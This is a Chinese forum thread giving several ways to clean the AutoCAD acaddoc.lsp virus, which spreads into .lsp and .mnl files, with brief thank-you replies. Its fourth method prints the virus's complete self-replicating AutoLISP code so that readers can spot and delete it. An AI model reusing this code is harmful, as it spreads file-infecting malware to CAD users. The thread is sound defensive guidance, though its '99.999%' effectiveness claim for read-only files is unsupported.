油氣儲運網(wǎng)

標題: autocad LSP病毒清理方法匯總(acaddoc.lsp病毒清理) [打印本頁]
作者: helloshigy    時間: 2016-4-15 13:07
標題: autocad LSP病毒清理方法匯總(acaddoc.lsp病毒清理)
“acaddoc.lsp”該病毒文件自動搜索CAD支持路徑下的所有“*.mnl”文件和“*.lsp”文件。將病毒代碼(“acaddoc.lsp”文件內(nèi)容)寫入“*.lsp”文件內(nèi),并在“*.mnl”文件中寫入“*.lsp”文件的加載路徑。同時,直線命令“l(fā)ine”、外部參照管理命令“xref”和分解(炸開)命令“explode”無法使用。

CAD系統(tǒng)感染該病毒文件后,只是簡單搜索刪除“acaddoc.lsp”文件,不能清除病毒。因為所有的“*.lsp”文件已經(jīng)被修改,所有“*.lsp”文件都是病毒文件。


解決方法1:

①、關(guān)閉CAD

②、搜索并刪除所有“acaddoc.lsp”文件

③、卸載CAD(必須卸載干凈,并進入C盤用戶目錄內(nèi)刪除沒有卸載完的CAD文件)后,重新安裝CAD

解決方法2:
①、關(guān)閉CAD

②、搜索并刪除所有“acaddoc.lsp”文件

③、找一臺沒有被CAD病毒破壞、且安裝有相同版本CAD的電腦,復(fù)制其所有“*.lsp”文件和“*.mnl”文件至本機覆蓋原文件(包括C盤用戶目錄內(nèi)的相關(guān)文件)

預(yù)防CAD病毒:

裝好CAD系統(tǒng)后,在沒有被病毒感染前,將CAD目錄內(nèi)所有文件的屬性設(shè)置為只讀,可以減少中毒的機率。(此法99.999%有效)

附:C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\

其中×××是你登錄系統(tǒng)時的用戶名, 200×和R×.×分別是CAD的版本和版本代號。(注意:目錄C:\Documents and Settings\是系統(tǒng)隱藏文件夾)


方法3
CAD開機運行時會有一大串函數(shù),并且產(chǎn)生acaddoc.lsp的文件處理方法
在網(wǎng)上找了很多所謂的CAD病毒專殺、acaddoc.lsp專殺什么的軟件。。。全試了都沒有用。后來通過網(wǎng)上介紹的一些關(guān)于lsp病毒的特性,親身試驗后確實有效,在此和大家分享,希望能為大家解決一些問題。
下面言歸正傳,殺毒步驟如下:
1、全盤刪除acaddoc.lsp(包括隱藏文件夾)
2、刪除C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acaddoc.lsp和acadapq.lsp
3、刪除C:\Documents and Settings\Administrator\Application。Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acad.mnl、acetmain.mnl和AecArchXOE.mnl。
4、刪除C:\Program Files\AutoCAD 2006\Support下面所有的*****.lsp,本人用的2006版共10個****.lsp文件。
5、COPY下面附件的alsp內(nèi)的兩個文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改為只讀。
6、COPY下面附件的mnl內(nèi)的三個文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改為只讀。
7、COPY下面附件的LSP內(nèi)的十個文件到C:\Program Files\AutoCAD 2006\Support,改為只讀。

經(jīng)以上步驟處理后,就完全可以放心使用了。


方法4
CAD的病毒很多但都大同小異,F(xiàn)就出現(xiàn)的ACADDOC.LSP病毒進行殺毒。不用重新安裝CAD的辦法。
1、發(fā)現(xiàn)文件夾中多出ACADDOC.LSP說明你中毒了。
2、關(guān)閉CAD程序。
3、全盤查找 *.fas *.lsp *.mnl *.arx文件,除了CAD安裝目錄以外的全部刪除。
4、檢查CAD安裝目錄文件的修改時間,把最近的幾個文件中的病毒代碼刪除。(用記事本打開)
5、把CAD安裝目錄中的所有*.fas *.lsp *.mnl *.arx文件改為只讀屬性。

說明:
1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support文件夾下的3d.lsp;3darray.lsp;acad2010.lsp;acad2010doc.lsp;acadinfo.lsp;ai_utils.lsp;attredef.lsp;edge.lsp;mvsetup.lsp;sample-profile-util.lsp文件。
2、要刪除的病毒代碼在文件的尾部,具體如下:
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
);while
);progn
);if
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn (1+ lspn))
(load "acadapq")
(princ)

作者: wangyi    時間: 2016-4-16 00:30
謝謝樓主分享
作者: 87737352    時間: 2016-4-17 08:11
謝謝樓主的講解和分享。
作者: 動力火車    時間: 2022-5-22 11:51
謝謝樓主的分享



歡迎光臨 油氣儲運網(wǎng) (http://tqvl.cn/) Powered by Discuz! X3.4